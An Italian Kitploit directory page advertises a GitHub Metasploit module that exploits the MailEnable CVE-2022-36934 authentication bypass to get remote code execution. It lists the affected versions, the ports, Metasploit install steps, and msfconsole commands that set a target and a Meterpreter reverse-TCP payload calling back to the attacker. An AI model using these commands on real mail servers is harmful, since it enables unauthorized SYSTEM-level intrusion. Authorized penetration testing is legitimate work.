Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
mailenable-cve-2022-36934 — Modulo Metasploit per MailEnable CVE-2022-36934 bypass dell'autenticazione RCE | Kitploit
Strumenti/GitHubGitHub/tdawg506/mailenable-cve-2022-36934
Framework di ExploitAnalisi delle VulnerabilitàSfruttamento di Applicazioni WebPenetration TestingStrumento di Accesso RemotoSviluppo Payload
GitHubtdawg506/mailenable-cve-2022-36934

mailenable-cve-2022-36934

Modulo Metasploit per MailEnable CVE-2022-36934 bypass dell'autenticazione RCE

Vedi Repository
91 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Modulo Exploit MailEnable CVE-2022-36934

Metasploit License

Modulo Metasploit per la vulnerabilità di bypass dell'autenticazione in MailEnable (CVE-2022-36934), che porta all'esecuzione remota di codice.

📌 Caratteristiche

  • Sfrutta la scorretta sanitizzazione dell'input di MailEnable in SMTP/POP3
  • Supporta sia target Windows x86 che x64
  • Nessuna interazione dell'utente richiesta (auto-attivazione tramite email appositamente creata)
  • Funziona con le versioni di MailEnable < 10.40

🚀 Installazione

  1. Copia nella directory dei moduli di Metasploit:
    cp modules/exploits/windows/smtp/mailenable_authbypass_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/smtp/
    
    
  2. Ricarica i moduli in msfconsole:

reload_all

  1. Utilizzo:

use exploit/windows/smtp/mailenable_authbypass_rce set RHOSTS <target_ip> set LHOST <your_ip> set PAYLOAD windows/x64/meterpreter/reverse_tcp exploit

🎯 Testato su:

MailEnable Professional 10.25 Windows Server 2019 MailEnable Enterprise 10.30 Windows Server 2016

📝 Dettagli tecnici:

Vulnerabilità: bypass dell'autenticazione tramite sintassi simile a SQLi in SMTP/POP3

Vettore d'attacco: rete (porte 25/110)

Privilegi: viene eseguito con l'account del servizio MailEnable (spesso SYSTEM)

⚠️ Disclaimer legale:

Questo strumento è solo per test autorizzati. Non usarlo mai contro sistemi che non possiedi o per cui non hai esplicito permesso di testare.

Scarica lo strumento